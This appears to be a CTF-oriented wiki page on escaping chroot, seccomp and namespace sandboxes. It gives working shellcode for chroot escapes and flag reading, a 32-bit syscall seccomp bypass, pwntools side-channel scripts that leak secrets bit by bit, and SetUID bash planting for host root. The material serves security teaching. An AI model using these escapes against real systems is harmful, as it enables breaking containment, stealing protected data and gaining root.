Sandboxes (chroot, seccomp & namespaces)

Escaping from sandboxes environments by exploiting the capabilities that were left open

chroot

chroot is a command and syscall that means Change Root, which will change the meaning of /. You provide it with a path to a directory that will be the jail, and it does two things (source):

Point / to the jailed directory (eg. /tmp/jail)
While inside the jail, ../ will not go up further than the root (/tmp/jail/.. -> /tmp/jail)

This command or syscall normally needs root permissions to work, and can be called like this:

chroot("/tmp/jail")

Or in the shell:

$ chroot /tmp/jail

Afterward, any path starting with / will be relative to /tmp/jail, and if your current directory is /tmp/jail, any ../ attempt will stop at /tmp/jail. A common pitfall is the fact that paths like /bin/bash or even dynamically linked libraries to spawn a shell are also relative to here, so all required functionality needs to be moved into the jail directory to work.

Importantly, what it does not do is:

Close existing resources (file descriptors)
Change the current working directory into the jail

It is not intended to be a security measure, as it is very limited in what it does, and many tricks can get past its protections, as will be explained in the following section.

Bypasses

Current directory still outside `chroot()`

One simple problem might be that the current directory is not set inside the jail. This allows you to access any file in your current directory before entering the jail and allows you to use ../ sequences freely. The only catch is that / paths will still be relative to the jail.

$ cd /       # move to root first
$ ./program  # progam might chroot() us to /tmp/jail, but forget to chdir()
# cat /flag  # attempt to access normally
/tmp/jail/flag: No such file or directory
# cat flag   # flag will be relative to CWD, so /flag is accessed
CTF{f4k3_fl4g_f0r_t3st1ng}

$ ./program  # start from anywhere outside of /tmp/jail
# cat ../../flag  # directory traversal is still possible
CTF{f4k3_fl4g_f0r_t3st1ng}

Shellcode (Assembly - readfile.s)

readfile.s

.global _start
_start:
.intel_syntax noprefix
        mov rax, 2
        lea rdi, [rip+flag]
        mov rsi, 0
        syscall       ; open("flag", O_RDONLY)
        mov rsi, rax  ; use return value (fd)
        mov rax, 40
        mov rdi, 1    ; STDOUT
        mov rdx, 0
        mov r10, 100
        syscall       ; sendfile(STDOUT, flag_fd, 0, 100)
flag:
        .string "../../flag"

Overwrite `chroot()`

Another big problem is that you can only have one chroot at a time, meaning if another chroot is started the previous one will be forgotten. Remember that only users with the CAP_SYS_CHROOT capability can call it, but if you are able to it is trivial to escape the jail, even from inside it. This can be done by moving the jail to somewhere you are not, such as a new directory you make.

$ ./program             # this time chroot() and chdir() are called
# cat ../../flag  # first attempt fails because ../ inside jail doesn't work
/tmp/jail/flag: No such file or directory
# mkdir new_dir
# chroot new_dir        # set chroot() to a new directory you are not in
# cat ../../flag  # now ../ is not restricted
CTF{f4k3_fl4g_f0r_t3st1ng}

Shellcode (Assembly - mkdir-chroot.s)

mkdir-chroot.s

.global _start
_start:
.intel_syntax noprefix
        mov rax, 83
        lea rdi, [rip+dir]
        mov rsi, 0777
        syscall          ; mkdir("a", rwx)
        mov rax, 161
        lea rdi, [rip+dir]
        syscall          ; chroot("a")

; Now cwd is outside the chroot

        mov rax, 2
        lea rdi, [rip+flag]
        mov rsi, 0
        syscall       ; open("/flag", O_RDONLY)
        mov rsi, rax  ; use return value (fd)
        mov rax, 40
        mov rdi, 1    ; STDOUT
        mov rdx, 0
        mov r10, 100
        syscall       ; sendfile(STDOUT, flag_fd, 0, 100)
dir:
        .string "a"
flag:
        .string "../../flag"

Open Resources

The last trick is utilizing already-opened resources that are outside the jail, which you can still interact with. If you are able to open the /flag file before being jailed for example, you can still read from the file descriptor it has (starts at 3).

// === Somewhere earlier in the program ===
open("/flag")  // -> returns 3 as fd
chroot(...)
// === In the shellcode ===
//sendfile(int out_fd, int in_fd, off_t *offset, size_t count)
sendfile(1, 3, 0, 100)

Shellcode (Assembly - fd-sendfile.s)

fd-sendfile.s

.global _start
_start:
.intel_syntax noprefix
        mov rax, 40
        mov rdi, 1    ; STDOUT
        mov rsi, 3    ; previously open file descriptor of /flag
        mov rdx, 0
        mov r10, 100
        syscall       ; sendfile(STDOUT, flag_fd, 0, 100)

The same goes for open directories, where you can use it as a different relative directory using syscalls like openat instead of open, or fchmodat instead of chmod.

// === Somewhere earlier in the program ===
open("/any/path")  // -> returns 3 as fd
chroot(...)
// === In the shellcode ===
//sendfile(int out_fd, int in_fd, off_t *offset, size_t count)
fd = openat(3, "../../flag", 0)  // -> returns 4 as fd
sendfile(1, fd, 0, 100)

Shellcode (Assembly - fd-openat.s)

fd-openat.s

.global _start
_start:
.intel_syntax noprefix
        mov rax, 257
        mov rdi, 3
        lea rsi, [rip+flag]
        mov rdx, 0
        syscall       # openat("/any/path", "../../flag", O_RDONLY)
        mov rsi, rax  # return value (fd)
        mov rax, 40
        mov rdi, 1    # STDOUT
        mov rdx, 0
        mov r10, 100
        syscall       # sendfile(STDOUT, flag_fd, 0, 100)
flag:
        .string "../../flag"

This last method is even more powerful because if you are able to start the program yourself via bash (like SetUID), you can let bash open a directory for you using the [n]< path syntax:

# # === same effect as above ===
$ ./program 3< /any/path

Using the fchdir syscall you can also use this trick to change the current directory outside the chroot, and use ../ directory traversal tricks again

seccomp

Seccomp (secure computing mode) is built to be a security mechanism, unlike chroot. It is a highly customizable way to restrict which syscalls are allowed and does so like a network firewall (it even uses the Berkley Packet Filter, originally made for networking). Often you will see this as an allowlist (all blocked except a few) or a blocklist (all allowed except a few). Blocklists are inherently dangerous because a developer may forget a dangerous call with unexpected functionality, but syscalls in an allowlist may still give unnecessary permissions that can be exploited.

A simple example of a blocklist using seccomp looks like this:

scmp_filter_ctx ctx;  // define context variable to set up rules

// Kill the program on any syscall
ctx = seccomp_init(SCMP_ACT_KILL);
// ... except read (allow)
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0) == 0);
// ... except write (allow)
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0) == 0);
// load the context, rules are applied from now on
seccomp_load(ctx) == 0);

This is an irreversible action that will make it so the rules are applied to any code further on the program, such as shellcode and even child processes or forks, but also any code the program contains itself. Because of this, the rules need to be lenient enough to allow regularly required code, but not so lenient that an exploit can abuse it.

Reading the rules

A good start in trying to bypass these rules is understanding them correctly. While static analysis might be enough for a simple program, a more complex one can be easier to understand through dynamic analysis. The following tool implements handy utilities for extracting seccomp rules:

The simplest and most common command is seccomp-tools dump which takes a binary that it will run. Using ptrace it can extract the seccomp rules at runtime and print them to the console:

$ seccomp-tools dump ./binary
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x25 0xc000003e  if (A != ARCH_X86_64) goto 0008
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0005
 0004: 0x06 0x00 0x00 0x00000000  return KILL
 0005: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0007
 0006: 0x06 0x00 0x00 0x00000000  return KILL
 0007: 0x15 0x00 0x01 0x0000003b  if (A != execve) goto 0009
 0008: 0x06 0x00 0x00 0x00000000  return KILL
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW

Seccomp rules are built with Berkeley Packet Filters (BPF), meaning they have instructions and code flow like assembly. This is what you see dumped and can analyze.

In the above example, it first checks if the architecture is equal to 64-bit syscalls, if not, it will goto the return KILL command, blocking any 32-bit syscalls. Then step by step the open, openat, and execve syscalls are checked and killed if it is any of those. When it passes through all the checks it ends at return ALLOW continuing with the syscall.

In more practical situations you might need some arguments or configuration for the seccomp filter to activate, where this tool won't find them yet by just running the binary. A simple trick for passing arguments is creating a .sh file that starts the program how you want it, then analyze that:

$ nano start.sh
./binary arg1 arg2 arg3
$ chmod +x start.sh
$ seccomp-tools dump ./start.sh
...

Lastly, you can even attach to a running process with this tool if the process is in a seccomp'ed state you would like to analyze.

$ sudo seccomp-tools dump -p 1337
$ sudo seccomp-tools dump -p `pidof binary`

Bypasses

There is no clean-cut way to "bypass" any seccomp configuration, and it really depends on what specific syscalls are allowed or denied. With that being said, there are some tricks developers might not expect that can still lead to a big impact (source).

Overly permissive policies

When common syscalls like open are blocked, there may be syscalls the developer forgot to block. Something like openat might still be allowed, while it can do almost the same using a Directory File Descriptor (DFD). In this specific case, a useful variable is AT_FDCWD which has a value of -100. It is a default DFD that points to the current working directory, meaning it can be used as a valid DFD in the ...at versions of syscalls.

There are simply a ton of syscalls, making a blocklist hard to make secure. You can check out a table of all syscalls to find one that seems interesting and is allowed, and get more information about an unknown syscall using the man 2 command for syscalls (eg. man 2 openat).

Architecture Confusion

This is a special case. There are two types of syscalls: syscall for 64-bit and int 0x80 for 32-bit. These architectures have different syscall numbers dependent on rax and eax respectively. By default, seccomp will kill all 32-bit syscalls. However, in certain non-default situations, you might find the 32-bit syscalls are enabled and more permissive than 64-bit. They can be enabled with the following line, and afterward need to be handled separately from 64-bit syscalls:

seccomp_arch_add(ctx, SCMP_ARCH_X86);

To exploit this, simply use a 32-bit syscall table and int 0x80 instructions instead of syscall. During compilation you don't need to do anything special, here is an example:

32-bit.s

        mov eax, 5
        lea ebx, [rip+flag]
        mov ecx, 0
        int 0x80       ; open("flag", O_RDONLY)
        mov ecx, eax   ; return value (fd)
        mov eax, 187
        mov ebx, 1     ; STDOUT
        mov edx, 0
        mov esi, 100
        int 0x80       ; sendfile(STDOUT, flag_fd, 0, 100)
flag:
        .string "flag"

Side Channels

While you might want to execute a shell using execve(), sometimes leaking secrets can be enough. If you find yourself being able to access sensitive information without being able to exfiltrate it to yourself, think about possible Side Channels. Even 1 bit of information can eventually be a full secret if repeated often enough. Here are some ideas:

The exit code of the program is 8 bits (0-255), using exit(): In bash, you can check the exit code of the previous command with the $? variable, and executing a program in any programing language often returns its 8-bit exit code. If you are able to read it you can exfiltrate 8 bits in one go, like one character of a string. Then repeatedly do this for each character in the string.
The runtime of a program, similar to Blind SQL Injection (sleep(), long computation, loop): To be efficient, this is a balance between a low wait for fast attempts, and a long enough wait to be able to confidently measure the difference. This scenario can be useful if there is really no response from the program, like in a remote setting.
Crash vs no crash: In some cases, it is obvious that a program crashed, because the application explicitly told you with an error message or simply if some expected output is missing. This can tell you 1 bit of information by either crashing or continuing execution, and the way to exploit this is similar to using the runtime of the program.

Using the exit code is pretty straightforward. We will read the flag into memory, then load a byte of it into the exit() argument, and call the function. In Assembly, we could leak the first byte:

mov rax, 0
mov rdi, 3          ; "/flag" fd (already open)
lea rsi, [rsp-100]  ; read onto stack
mov rdx, 100
syscall             ; read("flag", flag, 100)
mov rax, 60
mov rdi, [rsi+0]    ; offset here is 0, increment for next byte
syscall             ; exit(flag[0])

This might give exit code 67 when we check using echo $?, which corresponds to the C character. To leak the whole secret, we simply keep doing this while incrementing the offset:

Python Script (go through all bytes)

from pwn import *

elf = context.binary = ELF('./binary')

flag = b""
for i in range(100):
    # Dynamically compile the assembly needed
    payload = asm(f"""
        mov rax, 0
        mov rdi, 3
        lea rsi, [rsp-100]
        mov rdx, 100
        syscall
        mov rax, 60
        mov rdi, [rsi+{i}]  # <- insert i (offset) here
        syscall
    """)

    p = process()
    p.send(payload)

    exit_code = p.poll(True)  # Block until program exits
    flag += bytes([exit_code])
    print(flag)

    p.close()

When the exit code is not directly visible, you might be able to get a boolean response using the time or crash method. Implementing this can be done in various ways, but the simplest and most efficient way is to simply take the nth bit, and decide what to do depending on that bit.

To crash the program, you could read/write from an unmapped address for a 1, and simply ret for a 0. This is nicer than a time-based boolean result because you get an instant yes/no response, allowing quicker and more confident extraction. To extract a single bit in assembly, you can first use a byte offset, and then shift it using a bit offset:

    mov rax, 0
    mov rdi, 3
    lea rsi, [rsp-100]
    mov rdx, 100
    syscall
    mov al, BYTE PTR [rsi+1]  ; 8a 46 01 (01 is byte placeholder)
    and al, 2                 ; 24 02    (02 is bit  placeholder)
    jnz crash                 ; jump depending on result
    ret
crash:
    mov QWORD PTR [rax], 0    ; Write at a random unmapped address

We can then dynamically change this payload to get any byte and bit we need. In a Python script we go through all the bits to slowly recover the whole secret:

Python Script (go through all bits)

from pwn import *

elf = context.binary = ELF('./binary')

PAYLOAD = asm("""
    mov rax, 0
    mov rdi, 3
    lea rsi, [rsp-100]
    mov rdx, 100
    syscall
    mov al, BYTE PTR [rsi+1]  # 8a 46 01
    and al, 2                 # 24 02
    jnz crash
    ret
crash:
    mov BYTE PTR [rax], 0
""")

def get_bit(offset):
    p = process([elf.path, '/flag'])
    byte = offset // 8
    bit = offset % 8
    
    payload = PAYLOAD  # Replace byte and bit placeholders
    payload = payload.replace(b"\x8a\x46\x01", bytes([0x8a, 0x46, byte]))
    payload = payload.replace(b"\x24\x02", bytes([0x24, 1 << bit]))

    p.send(payload)
    exit_code = p.poll(True)  # Block until exit
    p.close()
    
    if exit_code not in [-11, -31]:
        return get_bit(offset)  # something unexpected happened, try again
    
    return exit_code == -11


flag = b""
binary = ""
i = 0
while not flag.endswith(b"}"):
    binary = ("1" if get_bit(i) else "0") + binary
    print(f"{binary: >8}")  # Build out byte in binary first
    
    if len(binary) == 8:  # If full byte, convert to ASCII
        flag += bytes([int(binary, 2)])
        binary = ""
        print(flag)
    
    i += 1

Namespaces

The workings of namespaces can go very complex, so this section will not go very deep. It will only show a few simple ideas on how to escape from namespaces with specific permissive features.

One dangerous part of namespaces is the ability to mount the host filesystem in the sandboxed environment. If you can read/write as a high-privilege user in the sandbox, you can do the same on the mount. This is the most interesting when you have access to a low user on the host machine, and access to a high user inside the sandbox. These can interact with each other to possibly receive high privileges on the host machine.

Imagine there is a /data directory mounted to /tmp/data in the sandbox that comes from the host. When you can write here, you can create a SetUID binary as the high-privilege user to then access as the low-privilege user on the host machine:

$ ./program    # Enter sandbox
# cp /bin/bash /data/bash  # Create a shell binary through mount on the host
# chmod +s /data/bash      # Set SetUID permissions on the shell binary
# # === using shellcode ===
# chmod("/data/bash", 06777)

# # Back on the host machine
$ /tmp/data/bash -p        # Execute the created SUID shell
bash-5.0#

Even when there is no directory explicitly mounted, you may be able to write a SetUID shell and access it on the host through the jail directory. Similarly to chroot, namespaces can use pivot_root to change the / to somewhere else. If you can make this directory accessible to the low-privilege host user, however, you may be able to access the SetUID shell again because it exists on the same filesystem:

$ ./program    # Enter sandbox
# cp /bin/bash bash  # Create shell binary
# chmod +s bash      # Set SetUID permissions as root
# chmod 777 .        # Allow low-privilege host user to access the jail directory 

# # Back on the host machine
$ /tmp/jail/bash -p        # Execute the created SUID shell
bash-5.0#

Previousret2dlresolve NextRace Conditions

Last updated 5 months ago

chroot

Bypasses

Current directory still outside chroot()

Overwrite chroot()

Open Resources

seccomp

Reading the rules

Bypasses

Overly permissive policies

Architecture Confusion

Side Channels

Namespaces

Current directory still outside `chroot()`

Overwrite `chroot()`